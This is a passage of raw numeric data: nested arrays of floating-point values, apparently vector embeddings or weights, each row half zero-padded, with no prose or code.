0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.23733, -0.101165, 0.889848, -6.52041, -1.65906, -0.855736, -0.317789, 1.5312, -0.918091, 2.70647, -0.264735, 1.04403, 0.526854, 0.671854, 1.23744, 0.191285, 
-0.121167, -1.54639, 0.388371, 0.0255405, -0.782519, 3.89872, 0.687486, -0.455295, -0.0177547, 0.349858, 0.318582, -0.856809, 0.503059, 0.742881, -0.632954, -0.949051, -2.30582, -0.814793, 0.479076, -0.355939, -0.543608, 0.222556, -0.806105, -0.369808, 0.663737, -0.0942454, -0.170493, -1.99632, -2.70297, -0.0341367, -0.875875, -0.031595, -0.215703, -2.3129, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0550891, -0.0224943, -0.0622061, -0.180562, 0.0120773, -0.00936254, 0.056982, 0.219266, -0.00341622, -0.0156384, -0.0508868, 0.286212, -0.0620782, -0.134647, 0.138551, -0.184282, -0.153711, -0.17806, -0.20755, -0.0176937, 0.025214, 0.283303, -0.158772, -0.0791035, 0.269124, 0.0119783, -0.144684, -0.0763744, 0.0436833, -0.213378, -0.00247521, 0.456591, 0.189497, -0.0156866, -0.0295005, -0.0234373, -0.0999273, 0.0249284, 0.165312, 0.0362619, 0.127952, -0.10286, -0.171889, -0.0592073, -0.364682, 0.364585, -0.00258498, -0.0270025, -0.126934, 0.0734512, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.325453, 0.143056, 0.279404, -0.435766, 0.158735, -0.0589792, 0.576084, -0.0931796, -0.505909, 0.236991, -0.663749, -0.374276, -0.0838953, 0.119638, -0.142504, 0.251342, -0.140083, -0.16247, 0.390923, -0.039304, 0.00170326, -0.2475, 0.197728, 0.14043, 0.0115669, -0.369747, 0.0879365, -0.0259219, -0.673674, -0.0861135, -0.710569, 1.11063, -0.079178, -0.0128023, -0.224507, -0.326976, -0.392109, -0.594843, -0.00207398, -0.487741, -0.210719, 0.0861112, 0.0942854, 0.343088, 0.43921, -0.225662, 0.0444574, -0.0193008, 0.452509, 1.04528, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.603652, -0.0582643, -0.119465, 0.348017, -0.164347, 0.433565, -0.874386, -0.731428, -0.907185, -1.23778, 1.50107, -2.73878, -0.0566513, 1.04193, 0.574915, -0.0406978, -1.20908, 0.529825, 1.64847, -0.0171819, -0.147332, 0.0717936, -0.0300766, 0.302866, 0.906337, -3.55731, -0.810585, -0.149828, -1.6091, -0.707194, 0.0339607, 1.60526, -0.572666, -0.351652, -0.0019823, -0.316028, 1.10957, -0.869783, -0.354948, -0.234748, 0.486653, 0.368461, 0.508104, 0.272281, -6.60046, -0.283617, 0.465647, 0.0256762, 0.255826, -0.340032, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.062351, -0.177152, -0.404799, 0.0295261, -0.0703788, 0.0234803, -0.341069, -0.0763415, 0.0318256, 0.0936421, -0.0928283, -0.0349344, -0.169364, -0.0699109, 0.476759, -0.0828952, 0.228247, -0.0391308, 0.178382, 0.0022318, -0.258059, 0.298705, 0.157171, -0.156554, 0.279488, 0.272931, 0.0612662, -0.215012, -0.210551, 0.0833694, 0.18352, -0.0361832, 0.224509, 0.139065, 0.0745194, 0.289014, -0.0765317, 0.486983, -0.0691808, -0.262537, -0.225232, 0.179907, -0.165886, -0.139819, -0.338371, 0.323547, 0.122383, -0.0278158, -0.081034, -0.292421, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.508427, -0.124275, -0.0867165, 0.354505, -1.09316, 0.0196925, -0.134485, -0.501109, -0.21509, 0.122663, -0.31624, -0.386874, 0.109047, -0.231796, -1.02438, 0.0751964, 0.252371, -0.0811082, 0.0599882, 0.028732, 
-0.0669159, -0.339303, -0.0210554, 0.271696, 0.0751932, 0.0353524, 0.344054, -0.180746, -0.0715953, 0.23854, 0.161234, -0.0656802, -0.576674, -0.0965278, -0.52024, -0.0924975, 0.420706, 0.0808923, -0.266712, 0.0272718, -0.299912, -0.482643, 0.0284087, 0.182375, 0.40949, 0.262549, -0.334968, 0.00815188, -0.444624, -0.296792, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.282334, -0.0569569, 0.0528054, 0.382469, 0.52649, -0.155319, -0.202552, 0.414113, 0.14626, -0.0126211, -1.09038, -0.471215, -0.112372, 0.132039, 0.133998, -0.413003, 0.121597, 0.36507, -0.238511, -0.0472868, 0.470372, -0.10494, -0.0280033, -0.136032, -0.138553, -0.446243, 0.200626, -0.415288, 0.119994, -0.240411, -0.636612, -0.840083, -0.777176, -0.576848, 0.165343, -0.281037, 0.427433, -1.88837, 0.0778203, -0.0162863, 0.158633, 0.372961, -0.436342, 0.567338, 0.489186, -0.421379, -0.137374, 0.0221045, 0.133323, -0.129448, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.366222, -0.10395, -0.34603, 0.520252, -0.230381, 0.298069, -0.686636, -0.414843, -0.269338, 0.361321, 1.40693, -0.566339, -0.0727639, 0.766474, -0.0350154, 0.322129, 0.764387, 0.720203, -0.450675, 0.0303459, 0.533235, -0.500824, -0.357372, -1.10112, -0.0098252, 0.334337, 0.321741, 0.536346, -0.259435, -0.529117, -0.560165, -0.0291179, -0.337819, -0.455375, -0.181991, 0.0438639, 0.787007, -1.41074, 0.108745, 1.212, -2.19863, -0.200723, 0.523096, -0.0616652, 0.187049, -0.08937, 0.531759, -0.0442423, 0.200114, -0.546411, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.520737, -0.176785, 0.254045, -0.32638, 0.246891, 0.301375, -0.145712, -0.374463, 0.202509, -0.172363, -0.168382, -0.363204, 0.0627762, 0.0952615, 0.73736, -0.693804, 0.263089, -0.0234419, 0.159914, 0.0270274, 0.237174, 0.544743, -0.266163, -0.357387, 0.0081816, -0.314011, -0.103174, -0.0811156, -0.308056, -0.34669, 0.693405, 0.698153, -0.154509, 0.0875965, -0.0242145, 0.602263, -0.589097, 0.282018, -0.0843388, 0.281944, -0.328064, -0.126423, 0.188118, -0.0367329, -0.237476, 0.164019, -0.0511404, -0.0181719, -0.182414, 0.535811, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0279318, -0.0610613, -0.0101412, -0.0552915, 0.0404394, -0.0573593, 0.00620857, -0.00222377, 0.0238538, -0.0148151, 0.0015523, -0.0367412, 0.0162746, 0.0211872, 0.00490808, 0.00470154, 0.0424634, -0.0241571, -0.00655395, 0.0282217, -0.0546177, -0.0318534, -0.0282441, -0.0324262, 0.013002, -0.0200125, 0.0185364, -0.0112108, -0.0334813, -0.0131698, -0.0173139, 0.0150257, -0.0391308, 0.017266, 0.00879118, 0.0263917, -0.00260935, -0.0124847, 0.0109101, -0.0547726, -0.0533904, -0.0669221, -0.0383629, 0.0244426, -0.00324389, -0.00702762, -0.045072, 0.0306992, 0.0109265, 0.0225712, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.124486, -0.114356, -0.213392, 1.41302, -0.673417, -0.233246, 0.370673, -0.314506, 0.594128, -0.255665, -0.315504, 0.31592, -0.1747, -0.05593, -0.0359449, 0.528949, -0.033689, 0.563513, -0.188641, 0.0333402, 0.0151033, 0.00195994, 
-0.0564992, -0.234697, 0.704199, 0.432101, 0.215732, 0.310275, -0.451169, -0.152856, 0.407915, 0.834554, 0.396813, 0.106043, -0.448964, 0.386099, -0.186383, -0.494229, 0.0411979, 0.5437, -0.28208, -0.23376, -0.159808, 0.345462, 0.629489, 0.0909301, 0.262915, -0.0140547, 0.0703901, 0.0870268, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0862763, 0.214661, -0.205132, -0.509698, -0.282893, -0.335409, -0.00281651, -0.0387833, 0.360551, -0.161184, 0.161555, 0.168777, -0.386635, 0.48953, -0.143622, -0.0548127, -0.823233, 0.0457209, 0.337856, -0.0091643, -0.0245709, 0.311056, 0.158591, 0.0588856, 0.0291222, 0.648995, -0.0892552, -0.0068762, -0.21661, -0.359363, -0.204125, 0.873177, -0.154894, -0.244434, 0.0870704, -0.251864, 0.241553, -0.636653, -0.419285, -0.0852114, -0.0273586, -0.245365, 0.315057, -0.396354, -0.172202, -0.70493, 0.488111, 0.0219731, -0.0403008, 0.198957, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.775, -0.4153, -0.325, 0.11206, -0.743, -0.7847, -0.7783, -0.357, -0.3572, -0.2256, 0.8965, -0.5527, -0.137, -0.2322, -0.4985, 0.4338, 1.434, -0.74, -1.06, -0.02292, 0.3357, -0.5933, -0.3743, -2.31, 0.2925, 1.002, 0.1504, -1.8955, -0.1383, -0.487, -0.686, -2.055, 0.519, 0.3054, 0.1713, 0.0961, 0.7974, -1.245, -0.736, 0.805, -0.1746, -0.1095, -0.208, -1.695, -1.001, -0.2129, -0.881, 0.002888, -0.05875, 
0.3933], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.29, -0.03906, -0.2354, -0.03415, -0.10144, -0.01044, -0.1532, 0.1461, 0.02034, 0.02051, -0.2045, 0.2296, -0.09644, 0.0688, 0.00507, -0.1898, 0.2593, -0.2717, 0.01345, -0.02364, -0.001004, 0.07086, -0.076, -0.1582, 0.08344, -0.007057, -0.02957, -0.09186, -0.007835, 0.01572, -0.3687, 0.2593, 0.512, 0.04703, 0.0245, 0.01399, -0.249, -0.1415, 0.06335, 0.1648, -0.1586, 0.1544, -0.1455, -0.1852, -0.02432, 0.546, -0.05106, 0.02898, 0.09436, 0.2444], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0992, -0.03665, 0.0755, 0.446, -0.179, -0.003029, 0.1338, -0.11163, 0.3823, 0.4194, -0.1648, -0.11163, 0.014046, -0.164, -0.2734, -0.05038, -0.1594, -0.1283, -0.1274, 0.02834, -0.08527, -0.3398, -0.01018, -0.0475, -0.296, -0.04236, 0.02834, -0.1705, -0.1997, -0.0786, -0.03047, 0.1416, 0.1153, 0.04245, -0.0896, 0.007713, -0.0468, -0.293, 0.0593, 0.1698, -0.02592, -0.134, -0.01156, 0.0412, 0.0758, -0.177, -0.01255, -0.01744, 0.1356, 0.03857], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.606, -0.2852, 1.463, -0.355, 0.363, 0.227, -0.7676, -2.104, -0.3958, 1.314, -1.756, 1.216, 0.3047, 0.06793, -0.4333, 1.424, -0.496, 0.1763, 0.1375, 0.003029, -0.7437, -0.2751, 0.161, 0.4504, 0.9434, 0.2081, -0.4136, 1.157, -0.1357, -0.2483, 0.26, -1.364, -1.373, 0.5283, 0.1482, 0.1624, 0.1709, -0.1891, -0.0934, -0.02731, 0.3472, 
0.2969, 0.4348, 1.459, 0.609, -1.538, 0.02306, 0.04095, 0.03262, 0.3625], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6704, 0.711, 1.287, -0.882, 0.02585, 0.903, -0.538, -0.1747, 0.2083, -0.2932, 0.519, -0.6226, 0.4097, 1.548, 1.2705, 0.1696, -1.907, -1.47, 0.02792, 0.045, 0.3552, -0.0628, -0.683, 0.3093, -0.6006, -1.02, 0.679, -2.227, 0.519, 0.08826, -0.9204, -2.588, 1.183, -0.2262, 0.361, -1.855, 0.692, 0.365, -0.5376, 0.1603, 0.0905, -0.6978, 0.963, 0.8667, 1.893, -1.294, 0.939, -0.013306, 0.755, -0.0373], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.12103, -0.11255, -0.332, 0.05768, -0.0953, 0.0641, -0.03802, 0.06915, 0.03943, 0.04324, 0.1776, -0.323, -0.0773, 0.011284, -0.0407, 0.0783, 0.3171, -0.04025, -0.1323, 0.04858, 0.052, -0.08936, -0.1218, -0.2203, 0.1725, 0.02106, -0.1056, -0.1294, 0.03105, -0.0714, 0.1608, 0.1882, 0.398, 0.02591, -0.1852, 0.2402, 0.04248, -0.1667, 0.088, 0.3218, -0.00452, -0.06635, -0.05438, 0.03738, 0.1805, 0.3733, -0.0776, 0.02304, -0.0942, 0.2075], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2489, 0.09827, 0.0847, 0.487, 0.05466, 0.2135, 0.01208, 0.4497, -0.2866, -0.458, -0.1879, -0.2264, 0.1866, 0.1179, -0.01207, 0.2566, -0.1731, -0.1342, -0.05603, -0.00453, -0.1923, -0.0885, 0.0402, 0.03986, 0.7373, -0.1722, -0.0685, -0.000752, 0.08527, 0.213, 0.3706, -0.3657, 0.3225, 0.189, 0.159, -0.106, -0.04468, -0.2416, 
0.0157, 0.03928, 0.05768, -0.01279, -0.2354, -0.3171, -0.2164, -0.3057, 0.04413, 0.0337, -0.07227, 0.1245], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3933, -0.2052, -0.3584, -0.1818, -0.2086, -0.2656, 0.3384, 0.3877, 0.803, 0.02977, 0.2449, -0.2124, -0.3303, -0.1943, 0.6855, -0.2123, 0.0727, -0.05243, 0.09, -0.02002, 0.1813, 0.9365, 0.0974, -0.2632, -0.06555, -0.2568, -0.0619, -0.0968, 0.3032, 0.0429, -0.10913, 0.4805, 0.5527, 0.1371, 0.4824, -0.0327, 0.1536, -0.01659, -0.2235, 0.71, 0.0423, -0.1101, -0.1142, 0.11053, -0.3755, 0.1428, -0.1603, -0.02127, 0.1349, -0.4062], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0819, -0.1776, -0.292, 0.359, -0.02063, -0.1548, -0.0579, 0.0736, -0.117, -0.3718, -0.273, -0.3613, 0.1082, 0.1825, 0.2527, -0.2335, 0.3574, 0.1912, -0.1494, -0.02388, 0.06506, 0.4192, -0.09357, -0.12067, 1.119, 0.3704, -0.1824, 0.6587, 0.0998, -0.144, 0.268, -0.2898, 0.5317, -0.1483, 0.1776, -0.1302, 0.0292, -0.3765, -0.2218, -0.08, -0.495, -0.05374, -0.3054, 0.625, -0.02094, 0.1508, -0.1566, 0.02116, -0.3584, 0.05008], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1948, 0.3728, -0.1361, 0.11566, -0.5645, 0.4578, 0.2284, 0.6157, 0.42, -0.4001, 2.256, 0.3875, -1.021, -0.0318, -1.053, 0.2354, -0.2, 0.4534, 0.11414, -0.03075, -0.0712, 0.655, 0.01973, -1.117, 0.2783, -0.0716, 0.1304, 0.418, -0.4968, -0.588, 0.04727, -0.2345, -0.0925, -0.5806, 
0.2189, 0.2443, 0.817, -0.605, -0.594, -0.5044, -1.771, -0.7603, 0.1456, -0.3418, -0.2927, 0.3887, 0.677, 0.02165, -0.02098, -0.06323], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6577, -0.236, -0.4783, -0.03047, -0.3738, 0.1978, 0.00821, 0.4717, 0.7007, 0.1306, -1.415, 0.09186, -0.10394, 0.04483, -0.1421, 0.4048, 0.523, 0.6626, -0.3564, 0.04642, 0.1959, 0.6846, -0.203, -0.2222, 1.343, -0.4192, -0.1051, -0.5073, 0.0592, -0.0714, -0.1371, 0.534, 0.1611, -0.3647, -0.2151, 0.585, -0.01637, -0.1387, 0.4822, -0.04886, -0.6177, 0.1624, -0.186, -0.1211, 0.982, 0.2793, -0.03424, -0.04288, 0.3738, -0.4102], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5103, 0.09033, 0.3735, 0.1948, -0.1389, 0.1824, 0.1335, -0.579, 0.2874, -0.1274, 0.2546, -0.674, 0.292, -0.4167, -0.562, 0.4072, -0.5674, 0.4937, 0.2043, 0.03568, -0.3105, -0.2053, 0.142, 0.2903, -0.8096, 0.2446, 0.1992, 0.616, -0.4163, 0.2472, -0.1268, 0.05493, -0.5186, -0.2101, -0.2161, -0.1375, 0.101, 0.10345, -0.2115, -0.0334, -0.003069, -0.339, 0.344, 0.00628, 0.593, -0.7144, 0.03635, -0.0182, -0.188, -0.12366], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.656, -0.381, -0.02853, -1.575, 0.8877, -0.3247, -0.8843, 0.6475, -2.822, -0.5913, 1.086, 0.2505, 0.06024, 0.5713, 1.09, -0.512, 0.2443, -1.53, 0.2532, 0.00834, -0.871, -0.8345, 0.2424, -0.01962, -1.341, -0.5503, -0.492, 0.08826, 0.754, 0.3643, -0.1277, 
-0.2169, -0.1167, -0.10394, 0.584, -0.558, 0.6816, 0.396, -0.669, -0.536, 0.617, 0.2524, 0.1788, 0.468, -0.2094, 1.015, 0.311, -0.03854, 0.364, -1.356], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06287, 0.1514, 0.08765, -0.4985, 0.4153, 0.1134, 0.09534, 0.00653, 0.722, 0.5737, 1.1045, -0.383, 0.02603, 0.7954, -0.6665, 0.3506, -0.1484, 0.01703, 0.06934, -0.003845, -0.1708, -0.2408, 0.1455, -1.104, 0.3008, -0.3713, 0.3455, 0.04282, 0.04285, 0.404, -0.0965, 1.083, -0.663, 0.1709, 0.3372, -0.871, -0.0401, -0.1877, -0.2192, 0.0567, -0.0701, -0.455, -0.4568, 0.838, 0.5356, 0.008965, -1.26, 0.03677, 0.1473, -0.4436], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02348, 0.02763, 0.01636, -0.007587, 0.03168, -0.05417, 0.00899, -0.0355, 0.0201, -0.02415, 0.03403, -0.04318, -0.05127, 0.00739, 0.01125, -0.02464, -0.0445, -0.05447, 0.0529, -0.04703, -0.03342, -0.02415, -0.05872, -0.03784, 0.01569, 0.04007, -0.04794, -0.01886, 0.03467, -0.0398, 0.00291, -0.006695, 0.0307, -0.01467, -0.04218, -0.04504, -0.005615, 0.001142, -0.01494, -0.006428, -0.03056, 0.01999, 0.0348, 0.03848, 